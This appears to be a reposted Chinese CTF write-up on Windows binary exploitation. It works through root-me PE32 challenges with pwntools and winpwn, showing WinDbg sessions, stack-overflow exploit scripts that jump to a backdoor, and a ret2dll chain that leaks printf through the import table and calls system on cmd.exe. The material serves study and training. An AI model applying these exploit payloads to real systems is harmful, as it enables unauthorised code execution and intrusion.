win-pwn初探(二)

admin 2022年12月30日10:08:38CTF专场评论2 views9080字阅读30分16秒阅读模式

上一节笔者学习了winpwn的用法,以及最基础的栈溢出利用用法和win pwn的保护机制的意思,这一节笔者学习了利用pwntools编写exp以及调试程序,也学习了ret2dll的利用手法

之前的文章链接:

  • win pwn初探(一)

win-pwn初探(二)

利用pwntools编写exp

这里需要Ex师傅的一个工具:Win Server,这个就像搭建pwn题一样,把exe给映射到一个端口上

git clone https://github.com/Ex-Origin/win_server.git

如上git clone之后即可使用,用法:.win_server.exe ..ch72ch72.exe 1234就可以把ch72.exe给映射到1234端口上,试着用nc连接一下,发现可以正常的执行程序

16:15:45 z1r0@z1r0deMacBook-Pro.local test nc 10.211.55.3 1234
a
A

pwntools如下安装

pip3 install pwntools

接着就可以正常使用pwntools了,需要注意的是目前只支持remote的用法

from pwn import *
from time import sleep

context.log_level = 'debug'

li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')
ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')

r = remote('10.211.55.3', 1234)

p1 = b'a' * (0x14 + 4)
p1 += p32(0x401000)
r.sendline(p1)
sleep(1)
r.sendline('calc')

r.interactive()

将上一节的exp改一下之后运行可以正常触发calc

结合pwntools进行调试

在调试exp的时候花了很长时间,断点下在了main函数入口那里,以为会直接断在那里的。然后运行的时候发现断不了,就在网上找解决方法(srv,reload),心态快要爆炸后,问了一下Ex师傅,师傅看了一眼就知道问题出在了断点下的太前,已经执行过了,在gets后下了一个断点就成功的断下来了

首先在exp前面加上一个pause()使得程序停住,如下exp运行

from pwn import *
from time import sleep

context.log_level = 'debug'

li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')
ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')

r = remote('10.211.55.3', 1234)

pause()
p1 = b'a' * (0x14 + 4)
p1 += p32(0x401000)
r.sendline(p1)

r.interactive()

然后利用windbg attach到程序上

win-pwn初探(二)

0x0401088这里下一个断点,并且输入g,g就是程序运行到断点停住

0:002> bp 0x0401088
0:002> g

然后回到exp那里输入任意键,执行payload,此时windbg会断到断点这里

0:002> g
Breakpoint 0 hit
eax=00000012 ebx=00243000 ecx=00402732 edx=0041b098 esi=0041be28 edi=0041be2c
eip=00401088 esp=0019fe74 ebp=0019fe90 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0023 efl=00000202
ch72+0x1088:
00401088 83c408 add esp,8

在ebp这里减去0x20就可以看到输入了a(0x61)被转换成大写A(0x41),并且后面可以看到ebp被覆盖成了aaaa而返回地址被覆盖成了0x00401000这个地址也就是后门地址

0:000> dc ebp - 0x20
0019fe70 00401088 0041b01c 0019fe7c 41414141 ..@...A.|...AAAA
0019fe80 41414141 41414141 41414141 00000010 AAAAAAAAAAAA....
0019fe90 61616161 00401000 00000000 06e29668 aaaa..@.....h...
0019fea0 06e29690 8abb39fd 00401347 00243000 .....9..G.@..0$.
0019feb0 00243000 00000000 00401347 00243000 .0$.....G.@..0$.
0019fec0 0019fea4 00000000 0019fef8 00401c60 ............`.@.
0019fed0 8ae3509d 00000000 0019fef0 762ec038 .P..........8..v
0019fee0 00243000 00000000 00000000 00000000 .0$.............

再次g就可以getshell,也可以单步调试-p,下面是ret之后的,可以看到成功跑进后门里

0:000> p
eax=00000000 ebx=00363000 ecx=00402732 edx=0041b098 esi=0041be28 edi=0041be2c
eip=00401000 esp=0019fe98 ebp=61616161 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0023 efl=00000246
ch72+0x1000:
00401000 55 push ebp

利用winpwn模块进行调试

winpwn调试和上面的区别是winpwn可以本地调试(对目前来说),在winpwn的官方文档里要求配置一个.winpwn到HOMEDIR这个文件夹里面,不知道homedir是什么就可以用如下python运行一下

Python 3.10.8 (tags/v3.10.8:aaaf517, Oct 11 2022, 16:50:30) [MSC v.1933 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.path.expanduser("~\.winpwn")
'C:\Users\MAC\.winpwn'
>>>

然后写入如下配置

{
"debugger":{
"i386": {
"x64dbg": "F:\ctfTools\debugTools\x64debug\release\x32\x32dbg.exe",
"gdb": "F:\ctfTools\windows-gdb\mingw-w64-686\mingw32\bin\gdb.exe",
"windbg": "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbg.exe",
"windbgx": "C:\Users\byzero\AppData\Local\Microsoft\WindowsApps\Microsoft.WinDbg_8wekyb3d8bbwe\WinDbgX.exe"
},
"amd64": {
"x64dbg": "F:\ctfTools\debugTools\x64debug\release\x64\x64dbg.exe",
"gdb": "F:\ctfTools\windows-gdb\mingw-w64-64\mingw64\bin\gdb64.exe",
"windbg": "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe",
"windbgx": "C:\Users\byzero\AppData\Local\Microsoft\WindowsApps\Microsoft.WinDbg_8wekyb3d8bbwe\WinDbgX.exe"
}
},
"debugger_init": {
"i386": {
"x64dbg": "",
"gdb": "",
"windbg": ".load E:\ShareDir\building\bywin\pykd_ext_2.0.0.24\x86\pykd.dll;!py -g E:\ShareDir\building\bywin\byinit.py;",
"windbgx": ".load E:\ShareDir\building\bywin\pykd_ext_2.0.0.24\x86\pykd.dll;!py -g E:\ShareDir\building\bywin\byinit.py;"
},
"amd64": {
"x64dbg": "",
"gdb": "",
"windbg": ".load E:\ShareDir\building\bywin\pykd_ext_2.0.0.24\x64\pykd.dll;!py -g E:\ShareDir\building\bywin\byinit.py;",
"windbgx": ".load E:\ShareDir\building\bywin\pykd_ext_2.0.0.24\x64\pykd.dll;!py -g E:\ShareDir\building\bywin\byinit.py;"
}
}
}

目前只需要改第7行的代码,把之前下载的windbg.exe的位置填进去就好了

然后exp如下

from winpwn import *
from time import *

#context.log_level='debug'
context.arch='i386'

file_name = './ch72.exe'

li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')
ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')

r = process(file_name)

windbgx.attach(r)
payload = 'a' * (0x14 + 4)
payload += p32(0x401000)
r.sendline(payload)

r.interactive()

运行exp时windbg就会自动启动,再像上面pwntools那样下断点即可

ret2dll

这个攻击手法和ret2libc相似,用root-me PE32 - Stack buffer overflow avancé这题来学习一下

题目地址,题目源码需要攻击成功之后才可以查看

在做这个题目前先理解一下什么是dll,DLL的全称是Dynamic Link Library,中文叫做“动态链接文件”,在Windows操作系统中,DLL对于程序执行是非常重要的,因为程序在执行的时候,必须链接到DLL文件,才能够正确地运行。而有些DLL文件可以被许多程序共用。因此, 程序设计人员可以利用DLL文件, 使程序不至于太过巨大。

这测试一下,写一个test.c

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv) {
printf("hello wrold");
system("pause");
return 0;
}

接着用进程资源管理器这个工具查看test.exe的dll有哪些

win-pwn初探(二)

看到了几个经常看见的dll,ntdll.dllkernel32.dllKernelBase.dllucrtbase.dll

  • ntdll.dll:ntdll.dll是重要的Windows NT内核级文件。描述了windows本地NTAPI的接口。当Windows启动时,ntdll.dll就驻留在内存中特定的写保护区域,使别的程序无法占用这个内存区域。是Windows系统从ring3到ring0的入口,位于Kernel32.dll和user32.dll中的所有win32 API 最终都是调用ntdll.dll中的函数实现的。ntdll.dll中的函数使用SYSENTRY进入ring0,函数的实现实体在ring0中

  • kernel32.dll:kernel32.dll是非常重要的32位动态链接库文件,属于内核级文件。它控制着系统的内存管理、数据的输入输出操作和中断处理,当Windows启动时,kernel32.dll就驻留在内存中特定的写保护区域,使别的程序无法占用这个内存区域

  • KernelBase.dll:系统文件kernelbase.dll是存放在Windows系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要

  • ucrtbase.dll:在介绍ucrtbase.dll前先看一下msvcrt.dll是啥,msvcrt.dll是微软在windows操作系统中提供的C语言运行库执行文件(Microsoft Visual C Runtime Library),其中提供了printf,malloc,strcpy等C语言库函数的具体运行实现,这个和libc.so很像。ucrtbase.dll其实就是把msvcrt.dll拆开了,主要的c运行时的代码放在了ucrtbase.dll

win-pwn初探(二)

整个调用链如上

现在回到题目,ida反汇编之后如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *v4; // [esp+1Ch] [ebp-4h]

__main();
if ( argc <= 1 )
{
fprintf(&__iob[2], "Usage: %s <filename>n", *argv);
exit(1);
}
v4 = fopen(argv[1], "r");
manage_file(v4, (char *)argv[1]);
return 0;
}

会把argv转入的filename通过fopen打开,传入到manage_file函数中,跟进

int __usercall manage_file@<eax>(int a1@<eax>, FILE *Stream, char *FileName)
{
void *v3; // esp
int v4; // eax
int v5; // eax
int v6; // eax
char DstBuf[8192]; // [esp+14h] [ebp-a] BYREF
int FileHandle; // [esp+2014h] [ebp-14h]
unsigned int MaxCharCount; // [esp+2018h] [ebp-10h]
FILE *v11; // [esp+201Ch] [ebp-Ch]

v3 = alloca(a1);
memset(DstBuf, 0, sizeof(DstBuf));
v11 = Stream;
printf("File name: %sn", FileName);
fseek(Stream, 0, 2);
MaxCharCount = ftell(Stream);
rewind(Stream);
printf("File size: %dn", MaxCharCount);
FileHandle = open(FileName, 0);
read(FileHandle, DstBuf, MaxCharCount);
close(FileHandle);
v4 = count_chars(DstBuf);
printf("Alphanumerical chars: %dn", v4);
v5 = count_words(DstBuf);
printf("Words: %dn", v5);
v6 = count_lines(DstBuf);
printf("Lines: %dn", v6);
printf("File pointer: %pn", v11);
return fclose(v11);
}

首先会输出文件名,接着会把文件大小给输出,然后打开文件通过read将文件里面的内容输入到DstBuf这个变量中,值得注意的是并没有对大小进行限制,导致栈溢出的发生,但是还有一个点是需要注意的,fclose(v11)这个v11直接栈溢出的话会被覆盖掉最后会导致失败,所以需要把v11先给泄露出来然后栈溢出的时候把v11还给覆盖成正常的pointer即可

所以先随便写一个文件然后运行一下输出一下File pointer

PS ch73> echo a > p1
PS ch73> .ch73.exe p1
File name: p1
File size: 8
Alphanumerical chars: 1
Words: 1
Lines: 0
File pointer: 75E2D660

拿到pointer之后就可以构造第二个payload了,因为这个程序没有system函数,但是我们需要getshell所以不得不寻找system,在glibc pwn中,可以使用ret2libc的攻击手法,在win中通过上面的介绍msvcrt.dll里提供了具体的实现,所以也是有ret2dll的攻击方法,原理和ret2libc差不多

在win中并没有plt和got表这个概念,但是DLL也用到了类似GOT的方法,称为导入地址数组Import Address Table,IAT),IAT和GOT非常类似,IAT中表项对应本模块中用到的外部符号的真实地址,初始为空(也不算为空),在装载后由动态链接器更新为真实地址。在ida中可以看到位于.idata段中

win-pwn初探(二)

plt其实可以看成下图的地址

win-pwn初探(二)

接下来构造第二个payload,也就是输出printf的真实地址,exp如下

from winpwn import *

context.log_level = 'debug'

printf_plt = 0x402974
printf_got = 0x406200

p1 = p32(0x75E2D660) * 2053
p1 += p32(0xdeadbeef)
p1 += p32(printf_plt)
p1 += p32(0x004016E3)
p1 += p32(printf_got)

p1 = [ord(i) for i in p1]

with open('./p2', 'wb+') as f:
f.write(bytes(p1))

f.close()

运行之后最后那一串就是printf的真实地址,因为是argv这种参数,所以接收地址不是很好接收,winpwn自动化没有输出(很奇怪),所以笔者就用动态调试exp来获得printf的真实地址,这里笔者用的ida调试的

PS ch73> .ch73.exe p2
File name: p2
File size: 8228
Alphanumerical chars: 2054
Words: 1
Lines: 0
File pointer: 75E2D660
pV觰PW觰癢觰 Y觰PY觰[File name: [?垭壝岰?*@

401825这里下个断点然后,在debug里面选择本地,找到程序后Parameters里面放入p2也就是argv,然后开始调试

win-pwn初探(二)

到断点那里,然后g搜索到406200这个地址,这个里面就存放的是printf的真实地址

win-pwn初探(二)

拿到printf真实的地址之后就需要算dll的base,在笔者的虚拟机里msvcrt.dll是在C:WindowsSyChpe32msvcrt.dll但是笔者在实机上测的时候这个程序的dll在 C:WINDOWSSysWOW64msvcrt.dll这里

把dll文件拖到ida中,搜索printf在dll里面的偏移算出dll_base,还有system以及cmd.exe的偏移并算出真实地址

printf_addr = 0x75D35670

dll_base = printf_addr - 0x10105670
system_addr = dll_base + 0x10105A70

cmd_addr = dll_base + 0x1010D158

最后再构造getshell的payload如下

p1 = p32(0x75E2D660) * 2053
p1 += p32(0xdeadbeef)
p1 += p32(system_addr)
p1 += p32(0x004016E3)
p1 += p32(cmd_addr)

p1 = [ord(i) for i in p1]

with open('./p3', 'wb+') as f:
f.write(bytes(p1))

f.close()

运行即可getshell

PS ch73> .ch73.exe p3
File name: p3
File size: 8228
Alphanumerical chars: 2056
Words: 1
Lines: 0
File pointer: 75E2D660
Microsoft Windows [版本 10.0.22000.1219]
(c) Microsoft Corporation。保留所有权利。

总结

这里笔者学习了IAT表和作用,还有argv参数的调试,坑点是msvcrt.dll这个文件位置需要根着自己本机的程序来确定,笔者卡在这里一段时间,最后想了一下把程序在ida中调试了一下才发现msvcrt.dll的位置和网上的wp有些不一样

Reference

https://zhuanlan.zhihu.com/p/406236763

https://baike.baidu.com/item/ntdll.dll/10959419

https://xuanxuanblingbling.github.io/ctf/pwn/2020/07/09/winpwn/

https://www.polarxiong.com/archives/%E5%A6%82%E4%BD%95%E7%90%86%E8%A7%A3DLL%E4%B8%8D%E6%98%AF%E5%9C%B0%E5%9D%80%E6%97%A0%E5%85%B3%E7%9A%84-DLL%E4%B8%8EELF%E7%9A%84%E5%AF%B9%E6%AF%94%E5%88%86%E6%9E%90.html

https://www.anquanke.com/post/id/210394


来源先知社区的【z1r0 师傅

注:如有侵权请联系删除

win-pwn初探(二)

 

如需进群进行技术交流,请扫该二维码

win-pwn初探(二)


原文始发于微信公众号(衡阳信安):win-pwn初探(二)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月30日10:08:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  win-pwn初探(二) http://cn-sec.com/archives/1488298.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: